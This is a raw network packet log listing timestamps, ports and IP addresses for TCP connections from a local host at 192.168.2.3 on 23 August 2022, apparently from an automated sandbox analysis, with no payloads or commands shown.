Aug 23, 2022 03:42:36.563685894 CEST	49741	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.597032070 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.597075939 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.597187996 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.597569942 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.597585917 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.598078966 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.598124027 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.598238945 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.598496914 CEST	49744	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.598551035 CEST	443	49744	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.598656893 CEST	49744	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.598763943 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.598783970 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.598943949 CEST	49741	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.598958015 CEST	443	49741	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.599057913 CEST	49744	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.599080086 CEST	443	49744	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.612993002 CEST	49745	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.613038063 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.613224983 CEST	49745	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.651918888 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.652674913 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.653652906 CEST	49745	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.653686047 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.658200026 CEST	443	49744	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.694149017 CEST	49744	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.694186926 CEST	443	49744	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.694502115 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.694559097 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.695077896 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.695123911 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.696599960 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.696696043 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.699721098 CEST	443	49744	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.699870110 CEST	49744	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.700192928 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.700282097 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.700393915 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.700479031 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.702593088 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.702636003 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.702838898 CEST	49744	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.703042984 CEST	443	49744	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.703294992 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.703389883 CEST	49744	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.703411102 CEST	443	49744	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.703548908 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.704472065 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.704504967 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.731782913 CEST	443	49744	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.731885910 CEST	49744	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.732180119 CEST	49744	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.732198954 CEST	443	49744	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.735016108 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.737864017 CEST	49745	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.737911940 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.738595009 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.739505053 CEST	49745	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.739770889 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.740072966 CEST	49745	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.761797905 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.783380032 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.785940886 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.786035061 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.786150932 CEST	49745	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.805783033 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.839826107 CEST	49745	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:36.839852095 CEST	443	49745	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:36.855021954 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.855082989 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.855184078 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.855371952 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.855612040 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.855777025 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.984488964 CEST	49742	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.984548092 CEST	443	49742	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:36.986349106 CEST	49743	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:36.986391068 CEST	443	49743	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:38.125992060 CEST	49752	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:38.126046896 CEST	443	49752	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:38.126137018 CEST	49752	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:38.127803087 CEST	49752	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:38.127819061 CEST	443	49752	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:38.206341982 CEST	443	49752	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:38.206480980 CEST	49752	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:38.224459887 CEST	49752	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:38.224498987 CEST	443	49752	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:38.234739065 CEST	49752	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:38.234760046 CEST	443	49752	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:38.263030052 CEST	443	49752	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:38.263149977 CEST	443	49752	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:38.263173103 CEST	49752	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:38.263225079 CEST	49752	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:38.272221088 CEST	49752	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:38.272270918 CEST	443	49752	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.359494925 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.359564066 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.359662056 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.359939098 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.359967947 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.407171011 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.417795897 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.417853117 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.418977976 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.426502943 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.426809072 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.440737009 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.440798998 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.440898895 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.441756964 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.441819906 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.441976070 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.441987038 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.442023993 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.442228079 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.442255020 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.525286913 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.529000998 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.541695118 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.541759968 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.542001963 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.542057037 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.542574883 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.542779922 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.543071985 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.543262005 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.543437958 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.543636084 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.543833017 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.578313112 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.578447104 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:40.578576088 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.606818914 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.631382942 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:42:40.631485939 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:42:40.785315990 CEST	49754	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:40.785363913 CEST	443	49754	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:41.796492100 CEST	49763	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:41.796530008 CEST	443	49763	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:41.796644926 CEST	49763	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:41.845880032 CEST	49763	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:41.845909119 CEST	443	49763	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:41.928760052 CEST	443	49763	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:41.928919077 CEST	49763	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:41.965186119 CEST	49763	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:41.965198040 CEST	443	49763	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:41.966970921 CEST	49763	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:41.966978073 CEST	443	49763	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:41.991235018 CEST	443	49763	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:41.991306067 CEST	443	49763	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:41.991372108 CEST	49763	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:41.991384983 CEST	49763	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:42.099476099 CEST	49763	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:42.099509954 CEST	443	49763	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:43.108540058 CEST	49765	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:43.108587980 CEST	443	49765	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:43.108685970 CEST	49765	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:43.109067917 CEST	49765	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:43.109086990 CEST	443	49765	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:43.186479092 CEST	443	49765	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:43.193357944 CEST	49765	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:43.193416119 CEST	443	49765	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:43.193923950 CEST	443	49765	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:43.194811106 CEST	49765	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:43.194968939 CEST	443	49765	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:43.225016117 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:43.250515938 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:43.250672102 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:43.250780106 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:43.364207029 CEST	49765	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:43.405525923 CEST	49755	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:43.405571938 CEST	443	49755	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.229804993 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:44.229852915 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.229964018 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:44.230247021 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:44.230261087 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.237344980 CEST	49765	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:44.262218952 CEST	443	49765	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.262351990 CEST	443	49765	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.262460947 CEST	49765	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:44.298305035 CEST	49765	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:44.298337936 CEST	443	49765	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.313680887 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.314723969 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:44.314775944 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.315336943 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.316011906 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:44.316164970 CEST	443	49768	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:44.462709904 CEST	49768	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:46.025388956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:46.059438944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:46.059595108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:46.112373114 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:46.112505913 CEST	443	49739	142.251.209.4	192.168.2.3
Aug 23, 2022 03:42:46.112612963 CEST	49739	443	192.168.2.3	142.251.209.4
Aug 23, 2022 03:42:46.138066053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:46.172043085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:46.301579952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:46.301608086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:46.301630020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:46.301764011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:46.301781893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:46.301842928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:46.301908016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:46.301917076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.335067987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.369249105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459132910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459166050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459187031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459208965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459229946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459249973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459270954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459292889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459315062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459333897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.459331036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.459399939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.459419012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493207932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493279934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493324995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493376970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493379116 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493412971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493438005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493451118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493477106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493484020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493520975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493532896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493573904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493614912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493645906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493681908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493685961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493690968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493716002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493726969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493743896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493767023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493767977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493824959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493827105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493861914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493880987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493922949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.493922949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493961096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.493963957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.494000912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.494007111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.494043112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.494045973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.494083881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.494103909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.494144917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528002024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528064013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528187990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528228045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528449059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528506041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528515100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528563976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528568983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528620958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528623104 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528666019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528683901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528729916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528744936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528795004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528798103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528844118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528845072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528897047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.528898954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528954983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.528958082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529020071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529061079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529100895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529119015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529141903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529160976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529191017 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529201984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529247046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529283047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529287100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529295921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529335022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529340982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529391050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529395103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529450893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529465914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529511929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529577971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529633999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.529752016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.529824972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.530251980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.530328035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.530601025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.530666113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.530914068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.530972004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.531312943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.531385899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.531630039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.531698942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.531867981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.531927109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.531936884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.531985044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532010078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.532063961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532078981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.532126904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532136917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.532182932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532215118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.532269001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532270908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.532330036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532350063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.532399893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.532433987 CEST	80	49774	45.95.11.158	192.168.2.3
